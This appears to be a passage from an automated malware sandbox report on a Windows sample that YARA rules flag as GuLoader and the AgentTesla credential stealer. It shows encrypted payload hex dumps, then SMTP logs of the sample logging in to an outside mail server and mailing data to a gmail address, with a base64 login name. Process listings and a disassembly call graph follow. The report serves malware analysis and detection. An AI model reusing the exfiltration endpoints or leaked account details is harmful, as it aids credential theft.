ae d3 1a 55 24 b4 cf 6a 19 4b 83 8c 8b d0 d0 06 38 ec b4 d8 78 d1 be
                                                                                    Data Ascii: .0#X@/Fe6RPn9p0ON+y:~)]djR.g9xl?6u$JYja4mKKeP;G27rk/{-}u"1KJR8q?$`iUvs#XV|ET/OU$jK8x
                                                                                    2022-05-10 20:11:05 UTC209INData Raw: 44 7e b9 d3 7c 13 dc 08 aa 3a f5 b5 90 f9 8a fc c1 82 df f0 98 9a cb 4e c2 eb 60 fe e4 41 13 f8 11 e1 f0 a6 3b 60 47 95 4a 98 02 fd 5e 97 32 e0 70 3b 8c b5 2d db 72 e0 41 31 18 19 68 cf 47 99 0e 29 bf f6 14 96 22 2f 9e 9d fe d6 71 a5 2d 50 5d 65 67 cc d7 6f 1a 3d 15 6a 2e ea c0 a4 82 ca 90 38 90 f5 ab 04 00 be f6 84 70 e4 ef e0 9f 41 87 9e ca 7c 2a 53 97 42 8e fe 7d b5 62 0c 83 6d ac 2a 35 2f d6 67 09 59 09 12 af c3 f5 2a f4 eb 9c a1 13 7c 34 ee e7 7e ba d2 4e 60 63 ff fd 18 a8 16 b2 ce 64 02 d3 ec 89 8c c7 0c c0 6f 4e f7 57 37 f3 4e d9 ba 88 20 b3 71 95 12 bf 4d 03 98 03 ff 3e 92 ff b2 c5 21 e5 f8 08 1f 4a 5f 07 2f 82 fa 28 9a 6c e9 fb 80 f1 18 f2 e5 e3 99 18 d1 83 88 be 4d 18 4b 12 d1 ad 76 59 db 7a dd 7d bf f4 1a 28 99 01 7e 59 58 62 27 52 9c 20 e1 d9
                                                                                    Data Ascii: D~|:N`A;`GJ^2p;-rA1hG)"/q-P]ego=j.8pA|*SB}bm*5/gY*|4~N`cdoNW7N qM>!J_/(lMKvYz}(~YXb'R
                                                                                    2022-05-10 20:11:05 UTC211INData Raw: a6 57 10 62 c9 c6 7f ff 02 6a f9 9d 24 9c 6e 14 6f 9e 89 02 91 ee 5a 1d e0 c8 70 34 49 24 5d 4e 65 62 c2 18 37 37 61 d1 32 e7 89 4d dc 95 e7 7b 7e 01 b6 c4 eb 6a f0 a5 d7 b3 6f da d9 d1 64 e9 9f 71 bf fb 02 8e 06 75 be 6c 6d 46 cc d2 99 5e 36 d9 85 b3 54 e8 37 95 10 36 9a 5e c7 54 c0 53 8a 45 44 4d da ae e1 b4 f2 0c 68 13 b1 ba ff 6c 20 a2 a1 0c ec ad 2a 0e 2b 1f 3c 9c 06 db d7 f0 fa 58 10 23 45 a3 f3 3d 83 08 5e c4 0e f8 da 23 ec 88 5f ae 07 1e 99 b4 d3 40 59 86 f1 10 f6 8b 10 ca 29 fa 31 d1 2b 1b 6c 17 04 72 c1 94 dd 15 10 f5 af 98 22 02 7d 2c f6 72 11 60 c6 ea 7e cb 4b bf 72 b9 90 93 c0 d0 22 78 85 63 85 ae f8 cc e0 6e f1 08 8f 20 a4 0c 1b 6a f4 14 2d 4e e5 e6 a8 61 0f 46 8d 86 f8 05 6b e2 22 42 30 03 c6 48 0a 47 a3 96 0c 32 a7 ab b2 50 4a 9d d3 c9 1a
                                                                                    Data Ascii: Wbj$noZp4I$]Neb77a2M{~jodqulmF^6T76^TSEDMhl *+<X#E=^#_@Y)1+lr"},r`~Kr"xcn j-NaFk"B0HG2PJ
                                                                                    2022-05-10 20:11:05 UTC212INData Raw: df 8e fe db 10 63 fa 1f 9f d9 d2 99 6d e9 f9 e5 4a 0c ea 91 49 ef b2 ab 41 43 83 52 9d 1a e3 5e 93 3c c1 61 1b 8f b1 ad d3 79 e7 4b 1f 15 05 e8 7f d7 22 12 35 3b 53 0a 91 1e 3e 9d 88 7c d6 7c 99 2d 42 df d6 ee a1 ca 5d 99 85 0c 62 04 ec cd b8 0e 7a 18 06 8e e9 22 34 32 3f d1 0d 74 e1 ed e3 8d 5f 9e 9a ca 6f a5 7a 89 42 85 f9 06 34 68 0f 83 67 82 25 39 3c ca 6e 0e 50 0a 11 9b dd e9 4d e0 eb 8e b7 2f 61 23 e1 79 df b8 c6 52 6f 70 cd e6 17 36 ba be dd 78 3c ee ee 98 9d 44 b3 de 6d 4e ec 4a 2c f4 6a 55 12 96 33 b3 64 80 25 b0 ce 34 9a 83 13 25 89 e7 89 de 2e 7b e8 04 0c 56 64 0b 30 86 f3 25 9d fc ea 5c 02 2a 04 93 fe ed 92 1e c9 88 88 a9 58 7d 4a 00 c2 bf f4 d5 d4 6a d3 73 a4 ed 12 26 05 84 62 4b 58 6e 2b d0 2d 35 9d d9 4c 71 40 a2 b3 37 4a aa da 76 a9 6d ec
                                                                                    Data Ascii: cmJIACR^<ayK"5;S>||-B]bz"42?t_ozB4hg%9<nPM/a#yRop6x<DmNJ,jU3d%4%.{Vd0%\*X}Jjs&bKXn+-5Lq@7Jvm
                                                                                    2022-05-10 20:11:05 UTC213INData Raw: 8e 83 54 67 8b 85 87 92 f1 51 1d e3 99 60 24 49 24 45 51 6e 6a d5 87 3f 3d 67 cd bd eb 86 ca 70 92 f4 6b 64 85 9b c7 f8 61 e0 b5 c2 31 db dd d4 cd 76 68 8f 76 ac f0 16 9e 1c f3 0b ee 63 54 59 95 98 56 22 49 b2 90 47 ff ab d0 09 7f 88 c9 f0 ca c0 4c 9c 43 77 4d d2 aa 71 06 f1 2e 67 00 21 78 c1 49 00 b7 a2 0d dc a7 19 0d 25 1b 28 8c 1f 50 d2 f2 f0 57 94 7e 44 9e f6 26 93 9e 6c ca 03 83 df 3f fa 09 7a b2 15 7e 83 b4 d3 59 59 9f e4 1a f7 ae 12 da ae cd 24 d1 36 1f 7d 15 0c 68 c3 8b d1 89 91 eb ba 87 2d 0a 40 2b ea 79 11 60 d5 ef 76 d6 4b b0 42 a5 0f 96 cf 5c 2a 77 b3 77 99 b7 f9 d4 ec 71 f2 03 82 34 a2 1a 13 7b 77 90 29 5a 64 a4 a1 6f 9c ea 8a 94 7b 58 60 f0 22 4b 3f 1d de 43 05 c3 ab 82 04 2d b4 b2 b3 49 45 19 cb dc 59 4e 5f 4b 27 e5 cc 66 07 c8 7b bd fd c7
                                                                                    Data Ascii: TgQ`$I$EQnj?=gpkda1vhvcTYV"IGLCwMq.g!xI%(PW~D&l?z~YY$6}h-@+y`vKB\*wwq4{w)Zdo{X`"K?C-IEYN_K'f{
                                                                                    2022-05-10 20:11:05 UTC215INData Raw: 5d f1 f8 57 09 e4 0e e2 f1 a6 d7 18 4f d4 4c b0 1f f1 df 0a 39 f3 e0 5b 9a a7 ac 4a 78 f5 c6 7f 0b 19 77 d0 db ae 1d 29 a5 ea 04 14 0b 37 94 91 fc cb 7e ab a9 10 41 6b e4 b1 dc 47 13 28 12 6c 2a ff 44 ea 9e b2 19 09 85 e6 ad 1c 3c a3 f8 18 73 e9 f2 fe 91 dc db 8f db fc 81 4e 81 c4 cf e1 34 b2 64 03 9c e9 79 3a b7 d8 d5 e3 39 5a 1c 87 20 d1 fa 4b f5 fe 9d b4 12 69 2b fb f3 66 b2 c8 5a 74 6c c2 fb 0d a6 62 b4 db 7e 2a c6 eb 8d 8e c4 08 d2 57 49 ed 5e 39 60 e2 d6 b5 15 7d b3 62 92 35 23 d6 00 9a 82 b7 31 80 e3 9a c5 34 e4 e0 0e 1f 5d 77 00 25 9a 7c 6b 9a 84 60 e1 0a 23 02 95 ed ed 95 11 c2 8e 8e bc 4d 18 4b 1c 46 86 f9 c9 df 79 d8 7c a6 fa 85 bd 99 18 7e 40 57 e2 18 4f 91 35 9d cc cd d2 5a 9f b7 38 cd 06 d3 7b 87 65 e3 2f 95 f7 9c 21 1c cc b9 7f ba a0 14 d2
                                                                                    Data Ascii: ]WOL9[Jxw)7~AkG(l*D<sN4dy:9Z Ki+fZtlb~*WI^9`}b5#14]w%|k`#MKFy|~@WO5Z8{e/!
                                                                                    2022-05-10 20:11:05 UTC216INData Raw: 6a 36 5e ae 40 5b 68 77 ce 05 33 37 7c d1 31 67 95 46 ec 97 ed 70 63 15 17 5c f7 61 e5 b5 c1 32 f7 de d4 cd 76 6b 1b 75 ac eb 0d 0a 97 70 b4 e2 63 4e d6 dd 92 4b 3b c5 0f 9a 47 e5 22 98 0a 5c 8f fc e0 41 cb 5f 0c c2 66 4a d1 ba 64 84 e5 ad 40 1d 80 3e cb 67 0e b3 32 a7 c4 24 33 1c b7 23 2b 9d 09 d1 d1 f8 fd 6d 15 34 44 b8 e7 b5 0a 8e 6e c0 0d 9e de 25 e8 8b 5f aa 00 17 9e b1 ca aa 47 83 f9 1c f8 9f 90 54 28 b4 39 d4 2b 1e 71 10 0a 75 c2 97 c8 95 8c f3 a7 95 25 0c 64 26 eb 77 0c 61 2b ef 70 d7 53 a2 78 ab 12 8e d2 a2 37 65 84 78 9e b1 e2 da e7 6a ea 1a 0a ac a0 04 1b 78 76 a1 2e 4f e1 ec bc 75 15 77 ab 87 f2 10 63 eb 26 47 3d 08 d3 51 0a 47 a3 96 04 38 bf 8e ad 5f 5f 90 8f ee 31 44 48 4f 3d fc da 71 12 dc 6e ba da c5 c0 f3 55 fa ab ad ce 5d d7 88 00 f7 65
                                                                                    Data Ascii: j6^@[hw37|1gFpc\a2vkupcNK;G"\A_fJd@>g2$3#+m4Dn%_GT(9+qu%d&wa+pSx7exjxv.Ouwc&G=QG8__1DHO=qnU]e
                                                                                    2022-05-10 20:11:05 UTC217INData Raw: 8c 4d 8c 18 62 c7 92 2a 61 8d 1f 89 a7 ad 06 7d e1 56 bf ef 14 6c c3 cf a4 15 35 38 83 1e 82 2c be 05 98 ec 57 9c bf 2f 54 54 7f ee b1 d4 4f 1a 32 91 11 2c e1 c2 ae 9e 5b f5 13 0d 2e b1 81 c4 b6 e1 05 71 f3 6f 06 84 5d 99 88 4a 99 2a 41 9a 42 8c fe 94 52 77 8d 69 61 86 2b 34 33 44 84 12 c5 ce 9d 2c d0 e0 46 f9 76 79 ae 8f 85 24 73 2e 7c 3a 31 5a 75 71 c8 e1 85 50 05 ad 53 8f 3f c9 ec 9f 0c 22 14 5c 9a 42 ff 48 39 61 9f c5 27 41 2c 3d 95 85 2f a5 4d 13 08 ef e5 bf 7f e6 a7 cf 2e 79 09 17 82 b0 64 0b 23 8e fa 29 9a 6d 84 e1 10 04 0f 89 63 0f 8a 99 24 88 94 27 9f 05 d6 37 ca b7 f0 d6 c8 e4 31 73 23 04 15 33 88 00 6d 4b 4d 6e 24 5c 9a 29 f7 c3 d0 de 4e 9f bc 2c e8 13 d5 62 09 85 f0 22 89 7d 1e 29 08 c0 a3 f6 8f ba 55 d0 75 aa b5 57 ce 7c 53 d6 aa 2c ea d1 f0
                                                                                    Data Ascii: Mb*a}Vl58,W/TTO2,[.qo]J*ABRwia+43D,Fvy$s.|:1ZuqPS?"\BH9a'A,=/M.yd#)mc$'71s#3mKMn$\)N,b"})UuW|S,
                                                                                    2022-05-10 20:11:05 UTC218INData Raw: cb a2 7f 9c 55 c4 98 f2 6c f7 0f 84 44 fe 7d 6c a8 c1 32 66 d7 cb 59 60 e2 8a 61 b0 7f 86 8a 1c f0 b2 eb 4d 47 ca 54 99 5e 36 cf 01 83 c8 e9 2e a0 02 5f 88 d5 e4 5c d7 cf 16 42 76 cd d3 b9 64 87 e5 ad 6d 1a a5 18 ca 78 81 a6 b5 ae d4 a4 1b 8c 32 11 26 9b 1b c1 5a 69 ff 57 94 36 48 b4 d6 35 87 98 ea 59 0c 8c 5b 2b e3 ab 5e af 12 05 1f 28 cf 57 c5 8b da 1f f1 9c 91 55 22 e6 b8 49 2e 1f 74 00 8b 7d d7 16 c8 9d 91 f2 af 98 20 04 7d 2c fe 66 8d c0 da fd f1 df 50 82 75 b9 93 17 dc 4e 30 45 84 6c 18 2e ec d9 ea 79 e6 8a 2f 01 b7 83 0e 6c de 09 39 c9 e1 ee 9c 7d 08 61 0a 1f fb 0a ef e4 28 43 25 82 9a 46 37 46 aa 8c 8e 71 a7 ab b2 50 5f 92 8c c8 38 5b 47 55 3f f1 d9 72 19 de 67 b7 f0 d7 ca f9 43 ef bc a3 c5 44 df 93 2a fd 72 13 47 8f bb 6e 6f fe 46 e8 bf 16 80 70
                                                                                    Data Ascii: UlD}l2fY`aMGT^6._\Bvdmx2&ZiW6H5Y[+^(WU"I.t} },fPuN0El.y/l9}a(C%F7FqP_8[GU?rgCD*rGnoFp
                                                                                    2022-05-10 20:11:05 UTC220INData Raw: 2d d3 79 e7 47 3f 16 17 6a de c6 a0 13 27 b9 f6 16 97 3e 3f 9c 99 fe d7 70 b9 28 50 5d 77 e6 b9 d2 4f 1b 20 10 64 24 ed c5 aa 8c db 11 01 8d fb a3 01 20 be e4 05 71 e1 ef e2 83 5d 9b 9a ca 7d 24 4f 93 45 8f ec 14 b6 65 0d 8d 69 8c 2b 37 21 c4 60 00 45 1b 93 2e df e7 43 e8 f6 80 bc 0f 61 36 f3 fb 6e ba d5 52 7c 71 ca f3 05 b4 0b bc d3 76 37 ce ee 8d 8c c6 06 dc 7e 4e ff 4b 2b e1 7b d7 a7 94 3d bd 6c 87 27 a2 4f 01 88 03 f7 3f 8e ed 87 cb 3c f9 e5 06 02 58 6a 05 2d 88 fd 2b 88 ed 68 e9 00 24 0a 9b e3 e3 9b 19 cc 86 86 a7 4a 14 57 0e c4 bd f7 c4 da 64 dd 41 a3 e8 87 2c 84 1d 63 7d 45 60 b9 52 94 27 f4 cb cd d0 46 82 b2 25 c8 17 d4 72 89 6c fe 2c 87 25 19 2f 81 c9 ab fc 87 b2 7d d7 67 a2 a0 45 4f e5 52 c5 2a c1 ff c3 71 76 bf 3e 0f 24 fd 61 c7 8a 94 69 14 54
                                                                                    Data Ascii: -yG?j'>?p(P]wO d$ q]}$OEei+7!`E.Ca6nR|qv7~NK+{=l'O?<Xj-+h$JWdA,c}E`R'F%rl,%/}gEOR*qv>$aiT
                                                                                    2022-05-10 20:11:05 UTC221INData Raw: d6 4f cd 80 f3 8f 1c ba ab ad 01 99 f6 11 c6 ae 6d e2 78 18 d6 89 0a 23 ab f5 e9 2e 5f a5 74 af 6b 98 58 fe 38 2c eb b4 87 24 a4 3d a2 2e 0d 2f a9 d0 10 ea 92 58 44 71 cf 55 f0 08 73 cf 9d f8 e6 87 34 00 3c 3a 01 b9 2e f3 fb d0 de 79 67 5b 31 cb 93 46 e6 ef 0f 85 75 fb b9 56 9c e2 30 c0 4b 72 e8 d4 a2 65 28 e6 8f 7d 92 b3 32 a9 5f bd 57 a2 44 71 14 60 28 55 b3 fe 8d f6 ef 92 d4 f6 18 2e 06 48 87 04 69 47 f4 d1 7d dd 77 82 57 8b 32 aa ee 7d 45 00 f7 0b fc c0 90 b4 86 3c 85 62 fc 69 c9 67 61 0c 85 37 25 42 c5 c4 94 5d 21 5c f8 e3 99 6d 1c 85 58 3c 09 0d d1 6d 37 7e 84 ea 7e 45 c9 da e6 3b 31 f7 b5 c3 3a 7a 6d 29 49 8a b4 17 78 b8 1f 81 f7 cd cb fb 5d ef ac bd c5 5a df 95 0a ff 6f 16 4f 81 b7 1d 6f 96 46 89 bf 23 80 41 39 f0 fd 21 f3 14 09 bf 3a 2c a0 b9 94
                                                                                    Data Ascii: Omx#._tkX8,$=./XDqUs4<:.yg[1FuV0Kre(}2_WDq`(U.HiG}wW2}E<biga7%B]!\mX<m7~~E;1:zm)Ix]ZoOoF#A9!:,


                                                                                    SMTP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                    May 10, 2022 22:12:46.709001064 CEST5874976977.246.191.210192.168.11.20220-cpanel501.servidoresdns3.net ESMTP Exim 4.95 #2 Tue, 10 May 2022 22:12:45 +0200
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    May 10, 2022 22:12:46.709335089 CEST49769587192.168.11.2077.246.191.210EHLO 141700
                                                                                    May 10, 2022 22:12:46.738776922 CEST5874976977.246.191.210192.168.11.20250-cpanel501.servidoresdns3.net Hello 141700 [102.129.143.39]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPE_CONNECT
                                                                                    250-AUTH PLAIN LOGIN
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    May 10, 2022 22:12:46.740099907 CEST49769587192.168.11.2077.246.191.210AUTH login YWRtaW5pc3RyYWNpb25AY29tYW5zaS5jb20=
                                                                                    May 10, 2022 22:12:46.770359039 CEST5874976977.246.191.210192.168.11.20334 UGFzc3dvcmQ6
                                                                                    May 10, 2022 22:12:46.838279963 CEST5874976977.246.191.210192.168.11.20235 Authentication succeeded
                                                                                    May 10, 2022 22:12:46.838928938 CEST49769587192.168.11.2077.246.191.210MAIL FROM:<administracion@comansi.com>
                                                                                    May 10, 2022 22:12:46.868448019 CEST5874976977.246.191.210192.168.11.20250 OK
                                                                                    May 10, 2022 22:12:46.868910074 CEST49769587192.168.11.2077.246.191.210RCPT TO:<federicornanetti1990@gmail.com>
                                                                                    May 10, 2022 22:12:47.071933985 CEST5874976977.246.191.210192.168.11.20250 Accepted
                                                                                    May 10, 2022 22:12:47.072268009 CEST49769587192.168.11.2077.246.191.210DATA
                                                                                    May 10, 2022 22:12:47.101628065 CEST5874976977.246.191.210192.168.11.20354 Enter message, ending with "." on a line by itself
                                                                                    May 10, 2022 22:12:47.103949070 CEST49769587192.168.11.2077.246.191.210.
                                                                                    May 10, 2022 22:12:47.136641026 CEST5874976977.246.191.210192.168.11.20250 OK id=1noWDv-006hia-BP
                                                                                    May 10, 2022 22:12:49.771874905 CEST49769587192.168.11.2077.246.191.210QUIT
                                                                                    May 10, 2022 22:12:50.004125118 CEST5874976977.246.191.210192.168.11.20221 cpanel501.servidoresdns3.net closing connection
                                                                                    May 10, 2022 22:12:50.885008097 CEST5874977177.246.191.210192.168.11.20220-cpanel501.servidoresdns3.net ESMTP Exim 4.95 #2 Tue, 10 May 2022 22:12:50 +0200
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    May 10, 2022 22:12:50.885515928 CEST49771587192.168.11.2077.246.191.210EHLO 141700
                                                                                    May 10, 2022 22:12:50.915431976 CEST5874977177.246.191.210192.168.11.20250-cpanel501.servidoresdns3.net Hello 141700 [102.129.143.39]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPE_CONNECT
                                                                                    250-AUTH PLAIN LOGIN
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    May 10, 2022 22:12:50.915954113 CEST49771587192.168.11.2077.246.191.210AUTH login YWRtaW5pc3RyYWNpb25AY29tYW5zaS5jb20=
                                                                                    May 10, 2022 22:12:50.945972919 CEST5874977177.246.191.210192.168.11.20334 UGFzc3dvcmQ6
                                                                                    May 10, 2022 22:12:50.983189106 CEST5874977177.246.191.210192.168.11.20235 Authentication succeeded
                                                                                    May 10, 2022 22:12:50.983692884 CEST49771587192.168.11.2077.246.191.210MAIL FROM:<administracion@comansi.com>
                                                                                    May 10, 2022 22:12:51.013180971 CEST5874977177.246.191.210192.168.11.20250 OK
                                                                                    May 10, 2022 22:12:51.013530016 CEST49771587192.168.11.2077.246.191.210RCPT TO:<federicornanetti1990@gmail.com>
                                                                                    May 10, 2022 22:12:51.176805019 CEST5874977177.246.191.210192.168.11.20250 Accepted
                                                                                    May 10, 2022 22:12:51.177195072 CEST49771587192.168.11.2077.246.191.210DATA
                                                                                    May 10, 2022 22:12:51.206748962 CEST5874977177.246.191.210192.168.11.20354 Enter message, ending with "." on a line by itself
                                                                                    May 10, 2022 22:12:51.277113914 CEST5874977177.246.191.210192.168.11.20250 OK id=1noWDz-006hj7-Eo
                                                                                    May 10, 2022 22:14:21.926006079 CEST49771587192.168.11.2077.246.191.210QUIT
                                                                                    May 10, 2022 22:14:22.157042027 CEST5874977177.246.191.210192.168.11.20221 cpanel501.servidoresdns3.net closing connection

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:22:10:33
                                                                                    Start date:10/05/2022
                                                                                    Path:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:306502 bytes
                                                                                    MD5 hash:D17D180329065DF1BF54501A2C8E138B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:22:10:51
                                                                                    Start date:10/05/2022
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
                                                                                    Imagebase:0xb0000
                                                                                    File size:108664 bytes
                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:22:10:51
                                                                                    Start date:10/05/2022
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
                                                                                    Imagebase:0xc90000
                                                                                    File size:108664 bytes
                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.26061242461.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:22:10:52
                                                                                    Start date:10/05/2022
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66fef0000
                                                                                    File size:875008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:10.1%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:21.5%
                                                                                      Total number of Nodes:1911
                                                                                      Total number of Limit Nodes:47
                                                                                      execution_graph 7401 401941 7402 401943 7401->7402 7407 402da6 7402->7407 7408 402db2 7407->7408 7452 40657a 7408->7452 7411 401948 7413 405c49 7411->7413 7494 405f14 7413->7494 7416 405c71 DeleteFileW 7418 401951 7416->7418 7417 405c88 7421 405da8 7417->7421 7508 40653d lstrcpynW 7417->7508 7420 405cae 7422 405cc1 7420->7422 7423 405cb4 lstrcatW 7420->7423 7421->7418 7537 406873 FindFirstFileW 7421->7537 7509 405e58 lstrlenW 7422->7509 7426 405cc7 7423->7426 7427 405cd7 lstrcatW 7426->7427 7429 405ce2 lstrlenW FindFirstFileW 7426->7429 7427->7429 7429->7421 7440 405d04 7429->7440 7430 405dd1 7540 405e0c lstrlenW CharPrevW 7430->7540 7433 405d8b FindNextFileW 7437 405da1 FindClose 7433->7437 7433->7440 7434 405c01 5 API calls 7436 405de3 7434->7436 7438 405de7 7436->7438 7439 405dfd 7436->7439 7437->7421 7438->7418 7443 40559f 24 API calls 7438->7443 7442 40559f 24 API calls 7439->7442 7440->7433 7446 405d4c 7440->7446 7513 40653d lstrcpynW 7440->7513 7442->7418 7445 405df4 7443->7445 7444 405c49 60 API calls 7444->7446 7448 4062fd 36 API calls 7445->7448 7446->7433 7446->7444 7447 40559f 24 API calls 7446->7447 7514 405c01 7446->7514 7522 40559f 7446->7522 7533 4062fd MoveFileExW 7446->7533 7447->7433 7449 405dfb 7448->7449 7449->7418 7453 406587 7452->7453 7454 4067aa 7453->7454 7457 406778 lstrlenW 7453->7457 7460 40657a 10 API calls 7453->7460 7461 40668f GetSystemDirectoryW 7453->7461 7463 4066a2 GetWindowsDirectoryW 7453->7463 7464 406719 lstrcatW 7453->7464 7465 40657a 10 API calls 7453->7465 7466 4067c4 5 API calls 7453->7466 7467 4066d1 SHGetSpecialFolderLocation 7453->7467 7478 40640b 7453->7478 7483 406484 wsprintfW 7453->7483 7484 40653d lstrcpynW 7453->7484 7455 402dd3 7454->7455 7485 40653d lstrcpynW 7454->7485 7455->7411 7469 4067c4 7455->7469 7457->7453 7460->7457 7461->7453 7463->7453 7464->7453 7465->7453 7466->7453 7467->7453 7468 4066e9 SHGetPathFromIDListW CoTaskMemFree 7467->7468 7468->7453 7475 4067d1 7469->7475 7470 40684c CharPrevW 7471 406847 7470->7471 7471->7470 7473 40686d 7471->7473 7472 40683a CharNextW 7472->7471 7472->7475 7473->7411 7475->7471 7475->7472 7476 406826 CharNextW 7475->7476 7477 406835 CharNextW 7475->7477 7490 405e39 7475->7490 7476->7475 7477->7472 7486 4063aa 7478->7486 7481 40646f 7481->7453 7482 40643f RegQueryValueExW RegCloseKey 7482->7481 7483->7453 7484->7453 7485->7455 7487 4063b9 7486->7487 7488 4063c2 RegOpenKeyExW 7487->7488 7489 4063bd 7487->7489 7488->7489 7489->7481 7489->7482 7491 405e3f 7490->7491 7492 405e55 7491->7492 7493 405e46 CharNextW 7491->7493 7492->7475 7493->7491 7543 40653d lstrcpynW 7494->7543 7496 405f25 7544 405eb7 CharNextW CharNextW 7496->7544 7499 405c69 7499->7416 7499->7417 7500 4067c4 5 API calls 7506 405f3b 7500->7506 7501 405f6c lstrlenW 7502 405f77 7501->7502 7501->7506 7504 405e0c 3 API calls 7502->7504 7503 406873 2 API calls 7503->7506 7505 405f7c GetFileAttributesW 7504->7505 7505->7499 7506->7499 7506->7501 7506->7503 7507 405e58 2 API calls 7506->7507 7507->7501 7508->7420 7510 405e66 7509->7510 7511 405e78 7510->7511 7512 405e6c CharPrevW 7510->7512 7511->7426 7512->7510 7512->7511 7513->7440 7550 406008 GetFileAttributesW 7514->7550 7517 405c2e 7517->7446 7518 405c24 DeleteFileW 7520 405c2a 7518->7520 7519 405c1c RemoveDirectoryW 7519->7520 7520->7517 7521 405c3a SetFileAttributesW 7520->7521 7521->7517 7523 4055ba 7522->7523 7524 40565c 7522->7524 7525 4055d6 lstrlenW 7523->7525 7526 40657a 17 API calls 7523->7526 7524->7446 7527 4055e4 lstrlenW 7525->7527 7528 4055ff 7525->7528 7526->7525 7527->7524 7529 4055f6 lstrcatW 7527->7529 7530 405612 7528->7530 7531 405605 SetWindowTextW 7528->7531 7529->7528 7530->7524 7532 405618 SendMessageW SendMessageW SendMessageW 7530->7532 7531->7530 7532->7524 7534 40631e 7533->7534 7535 406311 7533->7535 7534->7446 7553 406183 7535->7553 7538 405dcd 7537->7538 7539 406889 FindClose 7537->7539 7538->7418 7538->7430 7539->7538 7541 405dd7 7540->7541 7542 405e28 lstrcatW 7540->7542 7541->7434 7542->7541 7543->7496 7545 405ed4 7544->7545 7549 405ee6 7544->7549 7546 405ee1 CharNextW 7545->7546 7545->7549 7547 405f0a 7546->7547 7547->7499 7547->7500 7548 405e39 CharNextW 7548->7549 7549->7547 7549->7548 7551 405c0d 7550->7551 7552 40601a SetFileAttributesW 7550->7552 7551->7517 7551->7518 7551->7519 7552->7551 7554 4061b3 7553->7554 7555 4061d9 GetShortPathNameW 7553->7555 7580 40602d GetFileAttributesW CreateFileW 7554->7580 7557 4062f8 7555->7557 7558 4061ee 7555->7558 7557->7534 7558->7557 7560 4061f6 wsprintfA 7558->7560 7559 4061bd CloseHandle GetShortPathNameW 7559->7557 7561 4061d1 7559->7561 7562 40657a 17 API calls 7560->7562 7561->7555 7561->7557 7563 40621e 7562->7563 7581 40602d GetFileAttributesW CreateFileW 7563->7581 7565 40622b 7565->7557 7566 40623a GetFileSize GlobalAlloc 7565->7566 7567 4062f1 CloseHandle 7566->7567 7568 40625c 7566->7568 7567->7557 7582 4060b0 ReadFile 7568->7582 7573 40627b lstrcpyA 7576 40629d 7573->7576 7574 40628f 7575 405f92 4 API calls 7574->7575 7575->7576 7577 4062d4 SetFilePointer 7576->7577 7589 4060df WriteFile 7577->7589 7580->7559 7581->7565 7583 4060ce 7582->7583 7583->7567 7584 405f92 lstrlenA 7583->7584 7585 405fd3 lstrlenA 7584->7585 